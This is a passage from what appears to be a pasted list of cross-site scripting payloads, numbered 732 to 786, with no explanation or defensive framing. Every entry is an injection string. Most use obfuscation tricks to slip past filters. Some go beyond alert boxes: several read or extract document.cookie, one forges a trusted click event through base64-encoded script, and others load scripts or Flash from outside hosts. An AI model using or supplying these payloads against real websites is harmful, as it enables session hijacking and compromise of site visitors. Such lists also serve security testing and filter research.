  732. <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
  733. <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
  734. <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
  735. Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
  736. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  737. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  738. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  739. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  740. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
  741. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
  742. <var onmouseover="prompt(1)">On Mouse Over</var>?
  743. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  744. <img src="/" =_=" title="onerror='prompt(1)'">
  745. <%<!--'%><script>alert(1);</script -->
  746. <script src="data:text/javascript,alert(1)"></script>
  747. <iframe/src \/\/onload = prompt(1)
  748. <iframe/onreadystatechange=alert(1)
  749. <svg/onload=alert(1)
  750. <input value=<><iframe/src=javascript:confirm(1)
  751. <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
  752. http://www.<script>alert(1)</script .com
  753. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
  754. <svg><script ?>alert(1)
  755. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  756. <img src=`xx:xx`onerror=alert(1)>
  757. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  758. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?
  759. <math><a xlink:href="//jsfiddle.net/t846h/">click
  760. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
  761. <svg contentScriptType=text/vbs><script>MsgBox+1
  762. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  763. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  764. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  765. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  766. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
  767. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  768. <script>+-+-1-+-+alert(1)</script>
  769. <body/onload=&lt;!--&gt;&#10alert(1)>
  770. <script itworksinallbrowsers>/*<script* */alert(1)</script ?
  771. <img src ?itworksonchrome?\/onerror = alert(1)???
  772. <svg><script>//&NewLine;confirm(1);</script </svg>
  773. <svg><script onlypossibleinopera:-)> alert(1)
  774. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  775. <script x> alert(1) </script 1=2
  776. <div/onmouseover='alert(1)'> style="x:">
  777. <--`<img/src=` onerror=alert(1)> --!>
  778. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
  779. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
  780. "><img src=x onerror=window.open('https://www.google.com/');>
  781. <form><button formaction=javascript&colon;alert(1)>CLICKME
  782. <math><a xlink:href="//jsfiddle.net/t846h/">click
  783. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
  784. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  785. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  786. "><img src=x onerror=prompt(1);>
Add Comment
Please, Sign In to add comment